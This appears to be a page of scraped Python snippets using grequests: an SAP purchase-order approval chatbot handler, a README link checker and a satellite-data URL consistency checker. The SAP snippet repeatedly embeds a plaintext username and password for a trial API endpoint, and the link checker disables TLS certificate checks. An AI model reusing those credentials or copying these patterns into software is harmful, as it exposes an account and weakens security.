                response_array_post = []
                for response_post in post_reque:

                    if (response_post.status_code != 200):
                        print(
                            "hey problem in approving the request. Please try again later."
                        )
                        return approval_failure_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], approval_failure_reply, '', '', bot_memo[
                                        'scrapped_po_no']

                    else:

                        return after_approval_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], after_approval_reply, '', '', bot_memo[
                                        'scrapped_po_no']  #after this call the "next" task showing skill in bot

    elif ((bot_memo['index']) and present_skill == 'reject'):
        after_rejection_reply = 'successfully rejected, please say, "get my tasks", to get your previous pending approvals from the beginning, or say next to move on to your next task.'
        rejection_failure_reply = "there was an issue with the server, please try again later to reject..."
        session = requests.Session()
        header = {'x-csrf-token': 'Fetch'}
        present_task_instance_id = bot_memo['instanceID']

        # response = session.head("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header)
        # if (response.status_code != 200):
        #     return approval_failure_reply ,bot_memo['index'],present_task_instance_id,bot_memo['created_by'],bot_memo['SupplierName'], bot_memo['PurchaseOrderNetAmount'],approval_failure_reply,'','',bot_memo['scrapped_po_no']
        # elif (response.status_code == 200):
        #     cookie = session.cookies.get_dict()
        #     print(cookie)

        #     csrf = response.headers['x-csrf-token']
        #     #print(csrf)

        #     #post
        #     #approve
        #     header_2 = {'x-csrf-token':csrf}
        #     approve_po = session.post("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="+ "'"+present_task_instance_id +"'""&DecisionKey='0001'&Comments='test%20approve'",auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header_2,cookies=cookie)

        #     print('***************************************************************')
        #     print(approve_po.status_code)

        # approval request posted asynchronously
        url4 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        head_res4 = (grequests.head(u,
                                    auth=('pritamsa', 'rupu@0801'),
                                    headers=header) for u in url4)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque4 = grequests.map(head_res4, size=1)
        response_array4 = []
        for response4 in reque4:

            if (response4.status_code != 200):
                print("hey problem")
                return rejection_failure_reply, bot_memo[
                    'index'], present_task_instance_id, bot_memo[
                        'created_by'], bot_memo['SupplierName'], bot_memo[
                            'PurchaseOrderNetAmount'], rejection_failure_reply, '', '', bot_memo[
                                'scrapped_po_no']
            else:
                cookie = response4.cookies.get_dict()
                print(cookie)

                csrf = response4.headers['x-csrf-token']
                print(csrf)

                header_2 = {'x-csrf-token': csrf}

                url_post = [
                    "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="
                    + "'" + present_task_instance_id + "'"
                    "&DecisionKey='0002'&Comments='test%20reject'"
                ]
                post_res = (grequests.post(u_post,
                                           auth=('pritamsa', 'rupu@0801'),
                                           headers=header_2,
                                           cookies=cookie)
                            for u_post in url_post)

                post_reque = grequests.map(post_res, size=1)
                response_array_post = []
                for response_post in post_reque:

                    if (response_post.status_code != 200):
                        print(
                            "hey problem in rejecting P.O. . Please try again later."
                        )
                        return rejection_failure_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], rejection_failure_reply, '', '', bot_memo[
                                        'scrapped_po_no']

                    else:

                        return after_rejection_reply, bot_memo[
                            'index'], present_task_instance_id, bot_memo[
                                'created_by'], bot_memo['SupplierName'], bot_memo[
                                    'PurchaseOrderNetAmount'], after_rejection_reply, '', '', bot_memo[
                                        'scrapped_po_no']  #after this call the "next" task showing skill in bot

    # THIS LOGIC BELOW NEEDS TO BE RE_WRITTEN
    #************************************************************************************************************

    # elif((bot_nlp['ordinal'] and len(bot_nlp['ordinal']) <= bot_memo['no_of_line_items']) and present_skill == 'get_item_details'):
    elif (present_skill == 'get_item_details'):
        if (bot_nlp['ordinal']
                and len(bot_nlp['ordinal']) <= bot_memo['no_of_line_items']):
            # filter_item_ordinally = 'item : '+ (bot_nlp['ordinal'][bot_nlp['ordinal']['index']]['rank'])
            # print(filter_item_ordinally)
            print('///////////////////////////////////////////////////')
            nlp_ordinal_filter_index = bot_nlp['ordinal'][0][
                'index']  #this is the first element's index of nlp entity ordinal array
            individual_item_filter_string = 'item : ' + str(
                nlp_ordinal_filter_index + 1)
            item_level_reply_ordinally = bot_memo['all_item_details'][
                individual_item_filter_string]
            print(item_level_reply_ordinally)

            return str(item_level_reply_ordinally).strip(
                '{}'
            ), bot_memo['index'], bot_memo['instanceID'], bot_memo[
                'created_by'], bot_memo['SupplierName'], bot_memo[
                    'PurchaseOrderNetAmount'], bot_memo[
                        'after_approval_reply'], bot_memo[
                            'all_item_details'], bot_memo[
                                'no_of_line_items'], bot_memo['scrapped_po_no']

        elif (bot_nlp['ordinal'] == False and bot_nlp['number']
              and len(bot_nlp['number']) <= bot_memo['no_of_line_items']):
            # filter_item_ordinally = 'item : '+ (bot_nlp['ordinal'][bot_nlp['ordinal']['index']]['rank'])
            # print(filter_item_ordinally)
            print('///////////////////////////////////////////////////')
            nlp_number_filter_index = bot_nlp['number'][0][
                'scalar']  #this is the first element's scalar value of the nlp 'number' entity array
            individual_item_filter_string = 'item : ' + str(
                nlp_number_filter_index)
            item_level_reply_numerically = bot_memo['all_item_details'][
                individual_item_filter_string]
            print(item_level_reply_numerically)

            return str(
                item_level_reply_numerically
            ), bot_memo['index'], bot_memo['instanceID'], bot_memo[
                'created_by'], bot_memo['SupplierName'], bot_memo[
                    'PurchaseOrderNetAmount'], bot_memo[
                        'after_approval_reply'], bot_memo[
                            'all_item_details'], bot_memo[
                                'no_of_line_items'], bot_memo['scrapped_po_no']
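The approve and reject branches above follow the usual SAP Gateway CSRF handshake: a HEAD request with the header x-csrf-token: Fetch to obtain a token plus session cookies, then a POST that replays both. A stripped-down sketch of that handshake with grequests; the function name and the URL/auth arguments are placeholders, not the service used above:

import grequests

def csrf_post(fetch_url, post_url, auth):
    # step 1: fetch a CSRF token and session cookies with a HEAD request
    head_resp = grequests.map([grequests.head(
        fetch_url, auth=auth, headers={'x-csrf-token': 'Fetch'})])[0]
    if head_resp is None or head_resp.status_code != 200:
        return None

    token = head_resp.headers.get('x-csrf-token')
    cookies = head_resp.cookies.get_dict()

    # step 2: replay token and cookies on the state-changing POST
    return grequests.map([grequests.post(
        post_url, auth=auth, headers={'x-csrf-token': token},
        cookies=cookies)])[0]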
Example #32
0
def main(doc, timeout, size, debug, allow_codes, whitelist):
    """
    Examples:
    simple call
    $ vl README.md

    Adding debug outputs

    $ vl README.md --debug

    Adding a custom timeout for each url. Time in seconds.

    $ vl README.md -t 3

    Adding a custom size param, to throttle to n requests at a time

    $ vl README.md -s 1000

    Skipping some error codes. This will allow 500 and 404 responses to
    be ignored

    $ vl README.md -a 500,404

    Adding Whitelists

    $ vl README.md -w server1.com,server2.com
    """
    t0 = time.time()
    links = [i[0] for i in LINK_RE.findall(doc.read())]
    request_urls = []
    counts = {}

    for link in links:
        # no static
        if is_static(link):
            STATICS.append(link)
            continue

        # no dupes
        if link in counts:
            counts[link] += 1
            continue
        else:
            counts[link] = 1

        parsed = urlparse(link)
        # fix no scheme links
        if not parsed.scheme:
            link = 'http://{0}'.format(link)

        # whitelisted
        if whitelist:
            exists = [i for i in whitelist if i in parsed.netloc]
            if exists:
                WHITELISTED.append(link)
                continue

        request_urls.append(link)

    # collect dupes (links that appeared more than once)
    counts_keys = counts.keys()
    DUPES.extend([(i, counts[i]) for i in counts_keys if counts[i] > 1])

    requests = (grequests.head(u, timeout=timeout, verify=False) for u in request_urls)
    responses = grequests.imap(requests, exception_handler=handle_exception,
                               size=size)

    for res in responses:
        color = 'green'
        if is_error_code(res.status_code):
            if res.status_code not in allow_codes:
                ERRORS.append((res.status_code, res.url))
                color = 'red'
            else:
                WHITELISTED.append(res.url)

        status = click.style(str(res.status_code), fg=color)
        click.echo('[{}] {}'.format(status, res.url))

    errors_len = len(ERRORS)
    exceptions_len = len(EXCEPTIONS)
    dupes_len = len(DUPES)
    white_len = len(WHITELISTED)

    if errors_len:
        click.echo()
        click.echo('Failed URLs:')
        for code, url in ERRORS:
            code = click.style(str(code), fg='red')
            click.echo('[{0}] {1}'.format(code, url))

    if exceptions_len and debug:
        import ssl
        click.echo('Exceptions raised:')
        click.echo('Note: OpenSSL Version = {0}'.format(ssl.OPENSSL_VERSION))
        click.secho('Check URLs for possible false positives', fg='yellow')
        for url, exception in EXCEPTIONS:
            click.echo('- {0}'.format(url))
            click.secho('{0}'.format(exception), fg='red', bold=True)

    if dupes_len and debug:  # pragma: nocover
        click.echo('Dupes:')
        for url, count in DUPES:
            click.secho('- {0} - {1} times'.format(url, count), fg='yellow',
                        bold=True)

    if white_len and debug:
        click.echo()
        click.echo('Whitelisted (allowed codes and whitelisted param)')
        for url in WHITELISTED:
            click.secho('- {0}'.format(url), fg='magenta')

    click.secho('Total Links Parsed {0}'.format(len(links)), fg='green')
    click.secho('Total Errors {0}'.format(errors_len), fg='red')
    click.secho('Total Exceptions {0}'.format(exceptions_len), fg='red')
    click.secho('Total Dupes {0}'.format(dupes_len), fg='yellow')
    click.secho('Total whitelisted {0}'.format(white_len), fg='yellow')
    click.secho('Total static {0}'.format(len(STATICS)), fg='yellow')

    if debug:
        click.echo('Execution time: {0:.2f} seconds'.format(time.time() - t0))

    if errors_len:
        sys.exit(1)
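The handle_exception callback passed to grequests.imap above is defined elsewhere in the vl tool and not shown in this excerpt; judging from how EXCEPTIONS is unpacked in the debug report, a minimal compatible version (an assumption, not the original) would be:

def handle_exception(request, exception):
    # record the failing URL and exception for the debug report;
    # imap simply omits failed requests from the responses it yields
    EXCEPTIONS.append((request.url, exception))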
def main(sensor, start_date, days, api_endpoint):
    api = Api(api_endpoint)
    logger.info('Checking consistency for %s between %s + %s' % (sensor, start_date, days))

    aoi_nw = (-180, 90)
    aoi_se = (180, -90)
    aoi_ne = (aoi_se[0], aoi_nw[1])
    aoi_sw = (aoi_nw[0], aoi_se[1])
    aoi = [aoi_nw, aoi_ne, aoi_se, aoi_sw, aoi_nw]
    wrong_urls = list()

    for delta_day in range(1, days):
        start_time = time.time()
        start_date_date = parse(start_date) + datetime.timedelta(days=delta_day)
        end_date_date = start_date_date + datetime.timedelta(days=1)
        logger.info('Checking consistency for %s between %s and %s' % (sensor, start_date_date.isoformat(), end_date_date.isoformat()))

        # Object representation
        results = api.search_dataset(aoi, 100, start_date_date, end_date_date, sensor, full_objects=False)

        url_resources = list()
        missing_urls = list()
        missing_types = list()

        for r in results:
            if r['resources']['s3public']['zip'] is not None:
                url_resources.append(r['resources']['s3public']['zip'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('zip')
            if r['resources']['metadata'] is not None:
                url_resources.append(r['resources']['metadata'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('metadata')
            if r['resources']['quicklook'] is not None:
                url_resources.append(r['resources']['quicklook'])
            else:
                missing_urls.append('%s:%s' % (r['tile_identifier'], r['entity_id']))
                missing_types.append('quicklook')


        logger.info('total scans: %d' % len(url_resources))
        logger.info('already missed resources: %d' % len(missing_urls))

        if False:
            for counter, res in enumerate(url_resources):
                req = requests.head(res)
                if req.status_code != requests.codes.ok:
                    print(res, req.status_code)
                    missing_urls.append(res)
                print(res)
                if (counter % 25) == 0:
                    print(counter)
        else:
            counter = 0
            for url_parts in chunks(url_resources, 500):
                counter += 1
                rs = (grequests.head(u) for u in url_parts)
                res = grequests.map(rs)
                for u, req in zip(url_parts, res):
                    if req is not None:
                        if req.status_code != requests.codes.ok:
                            wrong_urls.append(req)
                            missing_types.append('zip_registered')
                    else:
                        # no response at all (connection error / timeout)
                        print('no response for %s' % u)

        if len(wrong_urls) > 0:
            for req in wrong_urls:
                print(req.url, req.status_code)
                append_data('/tmp/wrong_urls.txt', req.url)
        if len(missing_urls) > 0:
            append_data('/tmp/missing_urls.txt', missing_urls)

        if len(missing_types) > 0:
            for type in ['zip_registered', 'quicklook', 'metadata', 'zip']:
                logger.info('%d:%s' % (operator.countOf(missing_types, type), type))

        logger.info('wrong resources resources: %d' % len(wrong_urls))
        logger.info('Executed in %f secs.' % (time.time()-start_time))
    print('Wrong URLs:', [req.url for req in wrong_urls])
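The chunks helper used above is not defined in this excerpt; a conventional implementation (an assumption, not necessarily the original) is:

def chunks(seq, size):
    # yield successive slices of at most `size` items from `seq`
    for i in range(0, len(seq), size):
        yield seq[i:i + size]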